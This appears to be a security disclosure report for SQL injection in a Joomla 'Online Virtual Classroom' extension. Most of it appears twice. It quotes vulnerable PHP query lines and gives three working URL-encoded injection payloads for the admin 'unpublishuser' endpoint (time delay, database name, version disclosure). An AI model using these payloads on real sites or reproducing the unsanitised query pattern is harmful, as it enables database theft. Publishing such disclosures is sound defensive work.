SQL Injection is an attack technique used to exploit applications that construct SQL statements from user-supplied input. When successful, the attacker is able to change the logic of SQL statements executed against the database.
Structured Query Language (SQL) is a specialized programming language for sending queries to databases. The SQL programming language is both an ANSI and an ISO standard, though many database products supporting SQL do so with proprietary extensions to the standard language. Applications often use user-supplied data to create SQL statements. If an application fails to properly construct SQL statements it is possible for an attacker to alter the statement structure and execute unplanned and potentially hostile commands. When such commands are executed, they do so under the context of the user specified by the application executing the statement. This capability allows attackers to gain control of all database resources accessible by that user, up to and including the ability to execute commands on the hosting system.
The file administrator/controller.php contains the following code at 74
$query="select id from #__virtualclassroom_teacher where user_id='".$value."' ";
As seen clearly the variable value is injected without any sanitization into the SQL Query and then executed therefore causing the SQL Injection
Similarly there are other instances in the same file vulnerable to SQL Injection
95┆ $query="select id from #__virtualclassroom_teacher where user_id='".$value."' ";321┆ $row = 'SELECT class_id FROM #__virtualclassroom_acl WHERE group_id="'.$gid.'"';
CVSS Score: 8.8 (High)
Steps To Reproduce
Install Joomla 3
Login with any user on the admin panel
Install the extension
Make the request to the endpoint /administrator/index.php?option=com_virtualclassroom&task=unpublishuser&cid[]=309%27%20AND%20GTID_SUBSET(CONCAT(0x7170717171,(SELECT%20(ELT(7062=7062,1))),sleep(10)),7062)--%20mIHZ and the server with execute the sleep query for 10 seconds confirming SQL Injection
Make the request to the endpoint /administrator/index.php?option=com_virtualclassroom&task=unpublishuser&cid[]=309%27%20AND%20GTID_SUBSET(CONCAT(0x7170717171,(SELECT%20(ELT(7062=7062,1))),database()),7062)--%20mIHZ and the server with execute the database query and will disclose the database name in response
Make the request to the endpoint /administrator/index.php?option=com_virtualclassroom&task=unpublishuser&cid[]=309%27%20AND%20GTID_SUBSET(CONCAT(0x7170717171,(SELECT%20(ELT(7062=7062,1))),version()),7062)--%20mIHZ and the server with execute the version query and will disclose the version name in response
Similarly attacker can dump the entire database using this vulnerability.
Description
SQL Injection is an attack technique used to exploit applications that construct SQL statements from user-supplied input. When successful, the attacker is able to change the logic of SQL statements executed against the database.
Structured Query Language (SQL) is a specialized programming language for sending queries to databases. The SQL programming language is both an ANSI and an ISO standard, though many database products supporting SQL do so with proprietary extensions to the standard language. Applications often use user-supplied data to create SQL statements. If an application fails to properly construct SQL statements it is possible for an attacker to alter the statement structure and execute unplanned and potentially hostile commands. When such commands are executed, they do so under the context of the user specified by the application executing the statement. This capability allows attackers to gain control of all database resources accessible by that user, up to and including the ability to execute commands on the hosting system.
The extension for Joomla at https://extensions.joomla.org/extension/online-virtual-classroom/ contain SQLInjection vulnerability
Root Cause Analysis
The file
administrator/controller.php
contains the following code at 74$query="select id from #__virtualclassroom_teacher where user_id='".$value."' ";
As seen clearly the variable
value
is injected without any sanitization into the SQL Query and then executed therefore causing the SQL InjectionSimilarly there are other instances in the same file vulnerable to SQL Injection
95┆ $query="select id from #__virtualclassroom_teacher where user_id='".$value."' ";
321┆ $row = 'SELECT class_id FROM #__virtualclassroom_acl WHERE group_id="'.$gid.'"';
CVSS Score: 8.8 (High)
Steps To Reproduce
/administrator/index.php?option=com_virtualclassroom&task=unpublishuser&cid[]=309%27%20AND%20GTID_SUBSET(CONCAT(0x7170717171,(SELECT%20(ELT(7062=7062,1))),sleep(10)),7062)--%20mIHZ
and the server with execute thesleep
query for 10 seconds confirming SQL Injection/administrator/index.php?option=com_virtualclassroom&task=unpublishuser&cid[]=309%27%20AND%20GTID_SUBSET(CONCAT(0x7170717171,(SELECT%20(ELT(7062=7062,1))),database()),7062)--%20mIHZ
and the server with execute thedatabase
query and will disclose the database name in response/administrator/index.php?option=com_virtualclassroom&task=unpublishuser&cid[]=309%27%20AND%20GTID_SUBSET(CONCAT(0x7170717171,(SELECT%20(ELT(7062=7062,1))),version()),7062)--%20mIHZ
and the server with execute theversion
query and will disclose the version name in responseSimilarly attacker can dump the entire database using this vulnerability.
Video POC
https://github.com/braincert/Online-Virtual-Classroom/assets/51406427/51334160-d4b0-4c7d-9b81-90b0dcf4212c
The vulnerability was discovered in colloboration with @SivaPothuluru-Sajja